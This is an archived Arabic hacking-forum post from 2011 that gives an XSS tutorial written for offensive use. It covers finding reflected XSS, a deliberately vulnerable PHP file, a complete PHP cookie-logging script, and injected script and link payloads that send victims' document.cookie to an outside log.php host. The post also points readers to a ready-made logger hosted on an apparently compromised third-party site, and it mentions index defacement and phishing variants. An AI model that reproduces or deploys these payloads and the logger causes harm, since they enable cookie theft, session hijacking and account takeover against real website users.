عرض مشاركة واحدة
قديم 08-21-2011, 03:26 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
bleu moon
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~


بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره

نسميه مثلا ..~

xss.php



ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

<?
echo $_GET***91;'test'***93; ;

echo 
'<b>@nor15din</b>'
?>


طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع




طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

'"--></style></script>***************("Www.VbspiderS.Com")</script> 
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~




تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

<?php 


function GetIP() 

    if (
getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        
$ip getenv("HTTP_CLIENT_IP"); 
    else if (
getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        
$ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (
getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        
$ip getenv("REMOTE_ADDR"); 
    else if (isset(
$_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        
$ip $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        
$ip "unknown"
    return(
$ip); 


function 
logData() 

    
$ipLog="nor15din.txt"
    $****** = 
$_SERVER***91;'QUERY_STRING'***93;; 
    
$register_globals = (bool) ini_get('register_gobals'); 
    if (
$register_globals$ip getenv('REMOTE_ADDR'); 
    else 
$ip GetIP(); 

    
$rem_port $_SERVER***91;'REMOTE_PORT'***93;; 
    
$user_agent $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    
$rqst_method $_SERVER***91;'METHOD'***93;; 
    
$rem_host $_SERVER***91;'REMOTE_HOST'***93;; 
    
$referer $_SERVER***91;'HTTP_REFERER'***93;; 
    
$date=date ("l dS of F Y h:i:s A"); 
    
$log=fopen("$ipLog""a+"); 

    if (
preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    
fclose($log); 


logData();

echo 
'<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt



طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

كود PHP:

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> 
or

كود PHP:

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script> 
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره




اقتباس
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(




لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML



لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt


ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan



جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din





F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp


التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 07:01 PM.

   

رد مع اقتباس